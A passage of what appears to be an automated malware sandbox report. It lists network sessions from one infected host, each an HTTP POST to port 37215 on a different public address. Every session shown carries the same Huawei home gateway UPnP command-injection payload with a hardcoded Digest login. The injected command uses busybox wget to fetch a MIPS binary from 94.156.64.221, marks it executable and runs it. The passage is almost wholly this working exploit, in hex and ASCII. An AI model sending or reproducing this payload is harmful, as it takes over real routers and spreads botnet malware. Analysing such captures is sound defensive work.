                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    260192.168.2.233354441.244.158.16437215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.254416943 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    261192.168.2.2347530156.234.39.1337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.254453897 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    262192.168.2.2360378156.88.210.16137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.254488945 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    263192.168.2.2349572197.229.155.14137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.254528999 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    264192.168.2.2354026197.236.203.12137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.254585981 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    265192.168.2.2338622197.213.9.18837215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.254666090 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    266192.168.2.234557241.109.78.18137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.254746914 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    267192.168.2.2336170156.47.174.2137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.254785061 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    268192.168.2.233856641.5.46.18037215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.254817963 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    269192.168.2.2347606197.110.203.3537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.254853010 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
